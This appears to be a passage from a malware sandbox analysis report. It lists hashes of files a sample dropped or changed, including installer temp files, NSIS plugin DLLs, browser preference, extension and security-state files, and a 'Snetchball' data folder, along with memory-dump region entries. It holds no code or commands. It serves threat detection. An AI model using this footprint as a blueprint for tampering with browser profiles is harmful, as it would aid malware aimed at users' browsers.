| SHA512 | 565f3f7c9787264a231f3e7bf7f20ea05d82c422120050f3c168ce31b5f52d7e2f1b01011c30e593bc123602fb6317499e26ef01dbaa03ef7536f14b46f3a951 |
C:\Users\Admin\AppData\Local\Temp\is-CMO7U.tmp\AxnTxNXsNH.tmp
| MD5 | 0772dab3b71a115119373645908f8728 |
| SHA1 | 27a20f3809153980ef7a2b3f599c2683edc214aa |
| SHA256 | 62415d7ed167e7cf2e5cc0048dc5895e3e185a9cd670ae388c573dd777c034f6 |
| SHA512 | 478bcfa6a94a4c24c4f76610dd571cfbf343d7b610b68b69f46b6a8f6a5b162ab6414bdb6ffa9b97d7f979e53cf1ab31438ac45c2a1184f6faf92aba5569fd81 |
C:\Users\Admin\AppData\Local\Temp\7zS05233879\setup.exe
| MD5 | 9f1b088ecc5e2f36939797060e8f5956 |
| SHA1 | 78adf95b81e539d1450c61a8d135f5f836bcd4a9 |
| SHA256 | 1caa0f7f2913218f5bcd069a52aad482396914780d89f77c6610b70b36dc1e13 |
| SHA512 | 6bd73db75e7c7493ac6e03e745385641c4eccaeb1d8e96a2b157e1d4043d42990a05edd6702f28e25d4a25d4e39295739f1a6a6ccf89e629f6010ee8ebd66212 |
C:\Users\Admin\AppData\Local\Temp\is-UMQCG.tmp\_isetup\_shfoldr.dll
| MD5 | 92dc6ef532fbb4a5c3201469a5b5eb63 |
| SHA1 | 3e89ff837147c16b4e41c30d6c796374e0b8e62c |
| SHA256 | 9884e9d1b4f8a873ccbd81f8ad0ae257776d2348d027d811a56475e028360d87 |
| SHA512 | 9908e573921d5dbc3454a1c0a6c969ab8a81cc2e8b5385391d46b1a738fb06a76aa3282e0e58d0d2ffa6f27c85668cd5178e1500b8a39b1bbae04366ae6a86d3 |
C:\Users\Admin\AppData\Local\Temp\Opera_installer_2407160513113734808.dll
| MD5 | 82234053e684a16ea0b40a7f208f3233 |
| SHA1 | 00381b28887a12f9ef8ee51cdbcc4320679ae88b |
| SHA256 | 23bda6025409f7e0a044b10644f4bace9772426312a969552931291306917c23 |
| SHA512 | be3235cc7d6ed941ced36cdc43a87ffae3b5163cacc12c2cbe6f320b6469d1c16d0bf2e42558df504d2c1a12d0234cfd187438830a59554696864a234de5f357 |
memory/2456-667-0x0000000000400000-0x0000000000414000-memory.dmp
C:\ProgramData\AXE Byte Train 7.16.40\AXE Byte Train 7.16.40.exe
| MD5 | 237ecd4700cbe4067a075be7ea017d93 |
| SHA1 | f1d44a1597ace09859d74c027cdef665d7209e68 |
| SHA256 | f4e0993a49b614bfb2cdace65421e2c2f7ff1be8e561a6ee4d39be9102402563 |
| SHA512 | 6ecd087279b65d892d978b10daa56ad97a090a403189dda15183a155ce89d89bee6a68f9e92ab88444a152371bed2135ba729e712ea9e5947be3c4d2d26c8423 |
memory/2768-755-0x0000000000400000-0x0000000000D01000-memory.dmp
memory/4748-767-0x0000000006D50000-0x0000000006D9C000-memory.dmp
memory/4796-764-0x0000000000400000-0x0000000000898000-memory.dmp
memory/4680-756-0x0000000000400000-0x0000000000898000-memory.dmp
memory/4680-751-0x0000000000400000-0x0000000000898000-memory.dmp
C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports\settings.dat
| MD5 | 200e1b1a5036b8de7d75087531ae6e5c |
| SHA1 | 3246d34012da528f61c2acc2d8613e3e938039f2 |
| SHA256 | d1150e40762aa817c60f905432708cf181991c058c93ff41cc326d88d56032b5 |
| SHA512 | 8c357a9449760dc4dbe41edf1863448184e209aabe4e42a7dd487f1b6b2f87a16f72f48e5022020dcebc3d74cdde72e69ea6869bbb728215be016d2a80bdfdbe |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
| MD5 | 423e73f2116baffe79c53dee26060bec |
| SHA1 | 8041b1d3991501f2c95b37cf234d8abd2f6735b5 |
| SHA256 | 78efc4723d5b05624673d9cd03a300130accae1f8db6d2f730d8366e7607b2a0 |
| SHA512 | 12118bedf54826a84b1a9b899f203feb5c8dd6a3b75cca1b7a39f77cb993aa11fa67a5319be874c5f46f6c192df2eb8d935ef227f963cfdb5e5cb08c5189b0d0 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | a6682118176fd5364884f86ab04a1122 |
| SHA1 | f7467290b9cd75b0da534c1e16e911899fa36ca8 |
| SHA256 | df471866fe226d8dfcdd900a802f299591677263fbcc448e476c37ed96e6d3cc |
| SHA512 | 55d88c1f0173a5aab4df4832547f4b8e19e5770fac599bedf2f5a0cc4f0f82e736db1b9b6f755b2877d04b47dffc34760644e306d63da77bca90a8b4d94035fe |
memory/5372-809-0x0000000006C80000-0x0000000006CCC000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\Aa7IDT2z\1nudJF05xlZjfK8yyP.exe
| MD5 | a5c28707c5e04dbee7699ff8729bbfff |
| SHA1 | a229e4e88fad6fa382cd53f758af7579e6e10831 |
| SHA256 | 77d96b1c561454c31c8f0522934b5977cba696ab612475054039095aaa7f5513 |
| SHA512 | cf55bab8d8b41e0024c43416ff92feff30a4711916afa1a07739591c863668ed796a4670cba694b48954d7c1922420852819f970e8dca3f0e811a7b59cd94fdf |
C:\Users\Admin\AppData\Local\Temp\nsy8B02.tmp\INetC.dll
| MD5 | 92ec4dd8c0ddd8c4305ae1684ab65fb0 |
| SHA1 | d850013d582a62e502942f0dd282cc0c29c4310e |
| SHA256 | 5520208a33e6409c129b4ea1270771f741d95afe5b048c2a1e6a2cc2ad829934 |
| SHA512 | 581351aef694f2489e1a0977ebca55c4d7268ca167127cefb217ed0d2098136c7eb433058469449f75be82b8e5d484c9e7b6cf0b32535063709272d7810ec651 |
C:\Users\Admin\AppData\Local\Temp\nsy8B02.tmp\nsProcess.dll
| MD5 | faa7f034b38e729a983965c04cc70fc1 |
| SHA1 | df8bda55b498976ea47d25d8a77539b049dab55e |
| SHA256 | 579a034ff5ab9b732a318b1636c2902840f604e8e664f5b93c07a99253b3c9cf |
| SHA512 | 7868f9b437fcf829ad993ff57995f58836ad578458994361c72ae1bf1dfb74022f9f9e948b48afd3361ed3426c4f85b4bb0d595e38ee278fee5c4425c4491dbf |
C:\Users\Admin\AppData\Local\Temp\nsy8B02.tmp\blowfish.dll
| MD5 | 5afd4a9b7e69e7c6e312b2ce4040394a |
| SHA1 | fbd07adb3f02f866dc3a327a86b0f319d4a94502 |
| SHA256 | 053b4487d22aacf8274bab448ae1d665fe7926102197b47bfba6c7ed5493b3ae |
| SHA512 | f78efe9d1fa7d2ffc731d5f878f81e4dcbfaf0c561fdfbf4c133ba2ce1366c95c4672d67cae6a8bd8fcc7d04861a9da389d98361055ac46fc9793828d9776511 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | d155130d6aad67fa88754031f5896d79 |
| SHA1 | 9060cd0a79d2b432728165a168413232cb60047d |
| SHA256 | f2482d9ed4f053c0db19d1319c44417d71dc22ca06dbfa18ba71190d80888752 |
| SHA512 | 7998c8a4ab1d7a1ad7e4a2a5c1923b70f0b871d055e56347c672876e874335515b89b6aedf217cd606cea9e7d50c3b6e24d821d53a94c5e28d888ff31e0cdecc |
memory/5860-863-0x0000000010000000-0x00000000105E5000-memory.dmp
memory/5736-872-0x0000000005710000-0x0000000005A67000-memory.dmp
memory/5736-876-0x0000000005DA0000-0x0000000005DEC000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
| MD5 | 1b990c7d8fa20f6fc4ee17c81990e76d |
| SHA1 | d124553cd07878469eeaa83987e1ce07fafd8d21 |
| SHA256 | 45d80994e880fbf31b5310c83269726959f522d340d45da53905cfc8e5eec5dd |
| SHA512 | 420a2bd32d5d21d57f21b654d358f71ab5b7d5d6b5feebaa22abf466e61615be6d47683cb9764403c4ed376fd134b438fbf135581fd78893b83571020f544bf9 |
memory/2768-892-0x0000000000400000-0x0000000000D01000-memory.dmp
memory/4796-895-0x0000000000400000-0x0000000000898000-memory.dmp
memory/2020-894-0x0000000000400000-0x00000000004BA000-memory.dmp
memory/2456-893-0x0000000000400000-0x0000000000414000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202407160513121\additional_file0.tmp
| MD5 | dfe86cd1ab9fe5055dba3ead830574f6 |
| SHA1 | 800ba6757bf301a918a800ce15a3853e3941e019 |
| SHA256 | f9cdff6fea65207cde93c637cca4b92939359ede3ac7337c2048e076085e7e5f |
| SHA512 | d3d363a221a3fa7a010194965cb8cc7210aa17d81be094a3e8ee89bb2de684c3b874ce1c6c55e8109091a849874d05c1bae132d450dabe2597167782d0063570 |
memory/2768-948-0x0000000000400000-0x0000000000D01000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
| MD5 | 2f23a8ea6e73a7245d1ea03fca4765d6 |
| SHA1 | 68c94fa6440ff6194c88012bc553bcbd5784fb43 |
| SHA256 | 001d8d0ddcb9de2effc8d0e9ae5c64c4ef959746762f1a3c51a4677f91a48f44 |
| SHA512 | 3cbcbd5b8bc838a5cd81b123a023ebc694e209fb10821aeaf0af9571eefaf8b457ff2ab6bf19b8ffa52e407a797f5bdbb5c92d66d2993b8686b6873841b93307 |
memory/2768-969-0x0000000000400000-0x0000000000D01000-memory.dmp
memory/4796-972-0x0000000000400000-0x0000000000898000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index
| MD5 | 8662c55f9e2b38ba2c7b6b9b0c3b1637 |
| SHA1 | c438a0ca54f3a45605762baac053ca5d17214c23 |
| SHA256 | 053ca84c5dbb823d28667f061edd9283c00a3db8f7c3751c73728cec272dc508 |
| SHA512 | e3dbebce2e4d77b5c48ca63c7aea0f543e579f0328151c96ed01c48e32210d48171ada8fca347097be5bd803ff3c27ad888b9fccb48d063dbd6718e844956080 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
| MD5 | d8bacbe7a3e21fd9ed297d58b6afa46d |
| SHA1 | f11c6fd906f968cf0c84adccf55ccdc4e7ff8940 |
| SHA256 | 8f6f779e37433f932431590ff13f7091f58a0ceccc64612c2869ee04db72f75c |
| SHA512 | 5c6594a47df333120c267907748db559546e9140703298200cbda1ec057a3b73bddd9d353f4856de16a92fb905a1e329c048377acccd1c8a627cab4bb1f35d1b |
memory/2768-997-0x0000000000400000-0x0000000000D01000-memory.dmp
memory/4796-1000-0x0000000000400000-0x0000000000898000-memory.dmp
memory/4796-1001-0x0000000000400000-0x0000000000898000-memory.dmp
memory/2768-1013-0x0000000000400000-0x0000000000D01000-memory.dmp
memory/4796-1016-0x0000000000400000-0x0000000000898000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State
| MD5 | 993c7fafe5c425d652bd3d02ed1e1c71 |
| SHA1 | 78b077db8dd9f115d58ae499e9c7e04f42a96ac0 |
| SHA256 | c2fa15336b9de338482d74a1f6015d245537a5297cdf7ad81813297a0121cbb4 |
| SHA512 | 8c59955e72f9aa341cec6da8f1acca0e9f253a0533c92fcdb3bae081d1ef5db578da6c72e2b6354ffbd67d096041e64852492c7dd9da9705c4797e292bd77e42 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
| MD5 | 7473845fa0ba7f3f88db229d9352edd7 |
| SHA1 | e0ef9f4b9fb5e6c898c9898474834fc8d8f67287 |
| SHA256 | a05e9de0e5dc7dac74783b919a9178ba6393d8bf7f2fe3084788750ec5695846 |
| SHA512 | c6dc017611b90d9492ae4301eb255a13b4631045180860f6aa2f8b3ab0e345b9b9ada9dd7d3f5c7597be4d69d888c9a718d62dca6220ee08b9c342b9d8cddb36 |
memory/2768-1037-0x0000000000400000-0x0000000000D01000-memory.dmp
memory/124-1043-0x0000000010000000-0x00000000105E5000-memory.dmp
memory/2116-1055-0x0000000005480000-0x00000000054CC000-memory.dmp
memory/4796-1056-0x0000000000400000-0x0000000000898000-memory.dmp
memory/5524-1070-0x000001882A470000-0x000001882A492000-memory.dmp
memory/2664-1082-0x0000000000400000-0x00000000004BD000-memory.dmp
memory/2020-1085-0x0000000000400000-0x00000000004BA000-memory.dmp
memory/2768-1083-0x0000000000400000-0x0000000000D01000-memory.dmp
memory/4796-1086-0x0000000000CB0000-0x0000000000D52000-memory.dmp
memory/4796-1088-0x0000000000400000-0x0000000000898000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
| MD5 | 9f54211114dcc7169caf3b5aaa5bfef4 |
| SHA1 | 61b7f9f9aaea5f19ce6938983f5c91af4d0f88cb |
| SHA256 | 2075da7dbd82b023d1c7899e20e08fcbd1fb24bf1d5886b329e893da2e735a6b |
| SHA512 | 984d9ebfc6bd30e371604e7dc465234da8ceeb1471b95ab6789d1d0e7afcb7f1c140182173fc8652796bb2d8fee06a48dbd6161fa5e2cc09614c206b62364e4a |
memory/2768-1102-0x0000000000400000-0x0000000000D01000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
| MD5 | b75bbc171371f3c4160ddab784c6732c |
| SHA1 | 6e7830f6e3aa4e5214443fbaed3e0d5f7b7c4032 |
| SHA256 | edb0803ec3e8bbad8d28daa04e2ab631ec10e19ea56f1afa25b9604e8bda4b93 |
| SHA512 | cd0dd0790170b479d12c19a969324c22d266612fece7d832031f1bbedad700d948d0d0aa66a11b3b49fe5d571281b5c3db0ce52152bac2a25eb2835140c49692 |
memory/5664-1181-0x0000000005410000-0x000000000545C000-memory.dmp
C:\Program Files\Mozilla Firefox\browser\features\{DBDE73E2-BC5F-41AD-9E14-0105D4813C2F}.xpi
| MD5 | b2634a280c6e6cad601620cee6ab78ec |
| SHA1 | 6c161bed96d83f5f3ce604c6383c559dc3e2ee7e |
| SHA256 | 467dde7c8555a9c75f80ed43a6b7a91ba2a20c96070c30b02e544808e662b018 |
| SHA512 | 833bfb742d789402f7552d0327cbd2008e6d0a17bc9ce3496a2af6c6eeeb00d237516c455441903fa3794ca5ac5c4d50a64f70e70c839d80ca85046204fab60c |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\hipilpceecbhfpflneijogboalilnfjp\1.3.3_0\_locales\en\messages.json
| MD5 | 33292c7c04ba45e9630bb3d6c5cabf74 |
| SHA1 | 3482eb8038f429ad76340d3b0d6eea6db74e31bd |
| SHA256 | 9bb88ea0dcd22868737f42a3adbda7bf773b1ea07ee9f4c33d7a32ee1d902249 |
| SHA512 | 2439a27828d05bddec6d9c1ec0e23fc9ebb3df75669b90dbe0f46ca05d996f857e6fbc7c895401fecfae32af59a7d4680f83edca26f8f51ca6c00ef76e591754 |
C:\Users\Admin\AppData\Local\Temp\nseBC6E.tmp\liteFirewall.dll
| MD5 | 165e1ef5c79475e8c33d19a870e672d4 |
| SHA1 | 965f02bfd103f094ac6b3eef3abe7fdcb8d9e2a5 |
| SHA256 | 9db9c58e44dff2d985dc078fdbb7498dcc66c4cc4eb12f68de6a98a5d665abbd |
| SHA512 | cd10eaf0928e5df048bf0488d9dbfe9442e2e106396a0967462bef440bf0b528cdf3ab06024fb6fdaf9f247e2b7f3ca0cea78afc0ce6943650ef9d6c91fee52a |
memory/1664-1362-0x0000000005080000-0x0000000005112000-memory.dmp
memory/1664-1361-0x0000000000720000-0x000000000077E000-memory.dmp
memory/1664-1371-0x00000000056D0000-0x0000000005C76000-memory.dmp
memory/1664-1372-0x0000000005170000-0x00000000051BA000-memory.dmp
memory/1664-1373-0x0000000005C80000-0x0000000005D5C000-memory.dmp
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\hipilpceecbhfpflneijogboalilnfjp\1.3.3_0\_locales\pt_BR\messages.json
| MD5 | 5c5a1426ff0c1128c1c6b8bc20ca29ac |
| SHA1 | 0e3540b647b488225c9967ff97afc66319102ccd |
| SHA256 | 5e206dd2dad597ac1d7fe5a94ff8a1a75f189d1fe41c8144df44e3093a46b839 |
| SHA512 | 1f61809a42b7f34a3c7d40b28aa4b4979ae94b52211b8f08362c54bbb64752fa1b9cc0c6d69e7dab7e5c49200fb253f0cff59a64d98b23c0b24d7e024cee43c4 |
memory/1664-1457-0x0000000005EE0000-0x0000000005F7C000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\bnaebcjlolajbgllgjlmlfobobdemmki\3.8.26_0\_locales\es\messages.json
| MD5 | a14d4b287e82b0c724252d7060b6d9e9 |
| SHA1 | da9d3da2df385d48f607445803f5817f635cc52d |
| SHA256 | 1e16982fac30651f8214b23b6d81d451cc7dbb322eb1242ae40b0b9558345152 |
| SHA512 | 1c4d1d3d658d9619a52b75bad062a07f625078d9075af706aa0051c5f164540c0aa4dacfb1345112ac7fc6e4d560cc1ea2023735bcf68b81bf674bc2fb8123fb |
memory/1664-1469-0x0000000006310000-0x00000000063A0000-memory.dmp
memory/1664-1546-0x00000000063A0000-0x00000000066F7000-memory.dmp
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\n9orreff.default-release\prefs.js
| MD5 | 471ef42507f6b044fc2a8425b091efae |
| SHA1 | 40a360d7b813eb929af0a2427806944d485a617c |
| SHA256 | 728bd906bd2731e9e11cd6f475a61e6461680bc23733285807fed05f65f0a6ae |
| SHA512 | ffe7955d05b11feb5bb15b4a736c173fb76861409531d5581a90b12af4c872d3e6b25078d105072f6c296df868219f9e11415478cad43808e059adeea4eb23cb |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences
| MD5 | 59f448bc37a04f51d48d492514bfb754 |
| SHA1 | 2d83f12b76c874a473f41354867067800e633746 |
| SHA256 | 7780fafcd72fb51a793356e3d8116680e5cc2f801cfef509fa0f4870c9c22071 |
| SHA512 | 1a5e63f2daaf926e6b7bf71d0679de88b1d0f277e747c2fe9aa337e64f2c2f95a484d34a227dd234b36a6cbda102cccdae1dc641ebb13f8043248d3c9d59d86a |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | bc3a513ab2b7eb12ae032fd019646cb2 |
| SHA1 | 53f200463419cd1cb4664a96fe005fe2143f3478 |
| SHA256 | 7bbeac8f833b42c0cc2373d584a429b5bb3196d5e6b5dd666a31cd661e75bea4 |
| SHA512 | 1b35b7a50affb2adba6fc766925527b016989015b374db7ed54fca43b4d48389506c736edee8c1c0b0fb8c859cd8c0e9a9dee9fbb1f505405a94df0fe0e7acf1 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | f7827e14e36bf39cdba8adc88c47964c |
| SHA1 | dbe3606da71e197f5ed026d7d3d1e50fa1e8d88c |
| SHA256 | 131260989c7f93db9e0ab02ea96acd69573e5d8b9237a9596747fa9043db9f80 |
| SHA512 | 322044113f8b043f17a5f860369ab21701bf5c2a9a5656f161029191e9b29b3539ee72ff7cc0f8ed86715b9b0c73344a23a3859c7c02f217b4a379727911a8d9 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences
| MD5 | e7a798dd37d7799770774c71aef1adb9 |
| SHA1 | d60a513b3584be832c4f2ecde70dd59d287c795e |
| SHA256 | 5e6b9c3b5067425ca1032aaa11372e59154f66eb5c29fd8c721ec124d8c47ae2 |
| SHA512 | 052ad92dfbef14c11a71b3dc382c17d84c6eac9726531aad8d323bf325dd656f5ab74ab6969f57216a264ef6c35e3fe02ba96f56ac68519e74926403d1ff752a |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 4b3643b5bb9a212b2d2422047b994911 |
| SHA1 | b1269fc276f2bc014f4c8003e601ade8672d2f5f |
| SHA256 | b93e8e87624d83b9f39b67c571b43588905602d6f3a91507dd8963bd7eeb84b1 |
| SHA512 | 06b243d18c036ed845b258e78f7968c9e51768b2cc228a1f51eda8a151e05b4a637b7dce4f68ce2805cf702cdcfe0527cb7b30c12fc6c5f06c58b3484142a8f5 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT
| MD5 | 6752a1d65b201c13b62ea44016eb221f |
| SHA1 | 58ecf154d01a62233ed7fb494ace3c3d4ffce08b |
| SHA256 | 0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd |
| SHA512 | 9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\66c5e0c8-6ca1-4eed-a895-3e65e707f434.tmp
| MD5 | 18b723984cb175d4a530e78b3445e7f2 |
| SHA1 | 4203b2d49b4734a48bb55129bced2d0d1d983fa3 |
| SHA256 | 8ed68e513c469c130c25c3e51ea6275aa874a932364aa5b01d71ae4e5dd55a27 |
| SHA512 | 0c8dd08362bd002d9bc47d934c29780c5b37082c3b20d58240126d118e591ada733abc120ac65a3350b73e70d49ceaa0945e3c8dd02ffd78f4973b3b8db04bbb |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 1265d748a349cab172824363f73e6fca |
| SHA1 | ec9a15bd3964943ae047b62b6cffd92c405c7940 |
| SHA256 | 6fed948a71ddc4d20975b73c8fa7c575c3b064f0f4540d5eb745284cf596922f |
| SHA512 | 1f9cdaa83eb34de23b5e77e0ee46270e3fbdc072e2fe96b33a09fb90358b8ace1552c9fd1bb239aeff500e7ba182e6910d5bb117798b7479b05e9e1efb5e8d4c |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
| MD5 | 252a4f6d2142c0a137754ce0cdd7dc41 |
| SHA1 | 2a12a1c6972a5a1006ed409742423072749d714f |
| SHA256 | af232efbc657bf476146197a7003def490573ceebb1dccffa705c15a89aa5641 |
| SHA512 | 585253706fe69bddb55cb5487db4e9cfb3fa58e98999c859dca3f551172010c9ea6153a123cdb33e2c22e1f6ee97d5b4875a3589836741454919ece4df6c201b |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
| MD5 | 396180ea6cc200d77041a611f17d0474 |
| SHA1 | ff030fbc4805d7610e18840af3931f984517f451 |
| SHA256 | 6886bb641234ce1251c34da864c2b647467eeb723250ba7f4a52a4e1da47ca80 |
| SHA512 | 0743cd85cc5829307f15f56be93281d24437fe445af614ad101b6ff141cf2ae2dd974aeabe782635558b41043a3b269926ae22b6a1c639f780382ac8ccaec68d |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index
| MD5 | 34f4e3a457b541c9ecb1aa4f0fc7200d |
| SHA1 | 208116147b2d6c0183951ced5cbdd3ffedaf5bd8 |
| SHA256 | a391c0f835b76f84d039aef943c0462a5d96450069be45cd7aa8569a02332a7a |
| SHA512 | de29525e1f301324744d26e01046e2a57798be73d24345bed6f67491ff523b27d6b1707de2f9e6a26a1a529bcdee40ac4fba97e78f0b0deba31c3101fb12453d |
C:\Users\Admin\AppData\Roaming\Snetchball\info_0.txt
| MD5 | aa46e8f446c123464187f6ab09bba208 |
| SHA1 | 3101cd9b901e21c35b076e3497d7d8023a72982b |
| SHA256 | 5a5bef0d3b60cf9fadbf4f4ef5b61a2806664d886b5a357cce3d991af10e53ee |
| SHA512 | 0f7454ae80ee591f1efcdc7805658124be66eb0404cc6bda51826e8a960f8ebfcc383a8312b019587381deebc63fc4f54c2386940bcc4670f65c0223250878bc |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
| MD5 | 06dfa40975b9d3848af13450f6e748d7 |
| SHA1 | 2a77bba98be2a1c5f53532341aa99a1f09cc4622 |
| SHA256 | c8bc680e2eed8ef54be216eb93fd478664ea0fcd175b929cfc2dfeb97ad8368c |
| SHA512 | df9d16bf0f20a9fa7149aed20d00d99c558658430dbaa758b8cec9403c7b5847e2336761fb25784692169f708e6ce675042281fe6f1297c7112761aa51f82f8f |
C:\Users\Admin\AppData\Roaming\Snetchball\images\1.jpg
| MD5 | 9fbf7a24ea17d3d4473f447d8ff54726 |
| SHA1 | 0303b1b0760715c86f9720d07550a71b1eb795c7 |
| SHA256 | 5db965779bc248552da839c7a45212d1f2d40d1ed67cd6ce468b9b4bef01ed54 |
| SHA512 | 8ccc2fba04937599139a4e8110c8835943f906448021402be545253f8b40843b314068d7b044b07847a87ca65776a085b3837b85d8b35b133134dc5cdfebef22 |
C:\Users\Admin\AppData\Roaming\Snetchball\images\0.jpg
| MD5 | 76693f18ef81489e31e11cb8d839faea |
| SHA1 | 1276ac8fb3f92cf12ef79eb7d494b153556281a4 |
| SHA256 | 8f8f20850ed1481f43b284f7b335857510e0ab4e2edeefd37409e7f0590b64ea |
| SHA512 | cebc58be72f0cdbce858fb633c253e5b54d0e4ab9d41af74956ceada34fca3b456352f98a26983b47dcd3ffa792a9887f4cc846e9a824f07f2aab76bedb76aea |
memory/3484-2287-0x000000000A340000-0x000000000A3B8000-memory.dmp
memory/3484-2288-0x000000000BBB0000-0x000000000C0DC000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
| MD5 | 0e0c13970805088acbc91eeb5ddf8c60 |
| SHA1 | 1b15b97d1aab7abd364899adf14edc9ece19ab71 |
| SHA256 | 88ee112eadd47e3839986e1fcc20b3ffb239d379df0dcbca41119747c80bde90 |
| SHA512 | 58e03ce7e8d6e395572c07355a736e0fcf0456cb1abf0cfe09cf51d53fe6b2f6109e6311856430af5611cd3dc64c51ef8f5d6e93aa2fbd814af814f449b3fe63 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State
| MD5 | 5ae670f5003f4ba1ff4214471260aa60 |
| SHA1 | ece294ec32063e7ff605e73c05650675953aef3b |
| SHA256 | 7b108e4e59b5cfb7a6cff07dbf769b24847950b9ac48ba154ab5aa90fa576b15 |
| SHA512 | 5d63f6d2d0ddc5da0993fd5e4368b7c66fb2bc7b08126c3518ffebf481e62131f449ac045844bc2e7bade5d1a82bad1bf416fe7b07ad667abd2a76e617c33d1c |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
| MD5 | 98c0ed0d3b30c059a95dc62e3fbad686 |
| SHA1 | ea17133b723b4334ebc8b246bf4398812726a80f |
| SHA256 | 767b4672d516a6c8a48961a58704eabb98afc1bdfac0be7cfa0f6ef868390d05 |
| SHA512 | f2d2f1dda1907ae56af70845b1d30a70e1c002a3306cc0a8f2759ab15b4f77f792156754e0eddff04f257f327d1d15a32fc0234cff61e4522090a837878c01a1 |
C:\Users\Admin\AppData\Roaming\Snetchball\info_0.txt
| MD5 | 8680bb3de9fbccf2c43a5e755788e188 |
| SHA1 | 6e5188754c3d4239c4a57bd3168c3742f212bc2f |
| SHA256 | c942edf317faa294b44a0cd8d1ba0be3ee3afda86152c9a77871dc7f23c8226a |
| SHA512 | b4fe1eaaed07d386d6b938c549a2cb26ab80fb2d839a679447227b4d788a27e521267afec074a38fdf0c1875cd9272d2f298f1525a61223cc89fb18c36f4ca22 |
C:\Users\Admin\AppData\Roaming\Snetchball\images\4.jpg
| MD5 | 8ba32242fc5523797fff1f5d4ac6e072 |
| SHA1 | f463629503b5c925c13c34a708867449d60f4259 |
| SHA256 | ee4acfb5d318958f0b54989460233ecb06cc7cfb3b3c374c3a52f696bda23357 |
| SHA512 | c46d786911cd89decc545797ec058045e9113408cb13824da62bf772fea3ddaaa5a7614509f458095aa8610417c3045b48806e9d2e8f9ac39fcdc8b1ba4221bd |
C:\Users\Admin\AppData\Roaming\Snetchball\images\3.jpg
| MD5 | aa2a649d7a2b386576b5f6e95f244444 |
| SHA1 | c08d450a87f5fd7f8d54924a1d5ba03cfea53842 |
| SHA256 | e22e83dce601136feb8b27aa491f7da2d5088157320f1f63589fb75cd5fbfd0e |
| SHA512 | 1cb8bab062f4ea7f6d616ef02ca95815a9f1440d50ecafca525b5ae50684847328360ff34344aa21f8cd89104c0fd46cdf7fb83d70c2aed508e85b43ab4b191f |
C:\Users\Admin\AppData\Roaming\Snetchball\images\2.jpg
| MD5 | b884783591989547e2762bf621b44ef7 |
| SHA1 | 0d8488273b9aff8a4738211195ce24603a5a03c9 |
| SHA256 | ba26e8659f0532a16cfd4145ab79bf31a325eec47127d665369d5ba655bc2aaf |
| SHA512 | d71c54f89593a010accb376b69d408555b253cfe389550a898de4be17493cbf7ea14c10beb75e83b4a262bb0fd616e04873fa9fc4afb102ca17a5b465d2a44d9 |
C:\Users\Admin\AppData\Roaming\Snetchball\images\1.jpg
| MD5 | 784699259bf213484ad014465faebb98 |
| SHA1 | f41fb5142c0fd05d2d784cbf269f5351e43e3d62 |
| SHA256 | 3299f587b83881a548438e27d1651aefb8c93defcdc13336e316db87f29aa813 |
| SHA512 | 69d79a35a73b6b33ec15635e02308991c643eba761f774d04f428a31d45c213fe58a48e294fec7745836dd3abaf931af8714a63725bbf3f4b3a33f65a47a5bea |
C:\Users\Admin\AppData\Roaming\Snetchball\images\0.jpg
| MD5 | c697804dbbeaddb4e734b9bfc1b49abf |
| SHA1 | 0100b148445e894e6856598ccc5dc5ee36931cf2 |
| SHA256 | ffda78969c9189fc506353e0405599b52d8aa06583e746070f80718d1225b565 |
| SHA512 | 1c190ad5c60af7cf13c016b7bb2f7889f8a3fe382a6b8d34c28135dc67913e968fc13acf15ed76a451c69179234fb4ff5f8daf35acd3bb866aadeca434dedf38 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
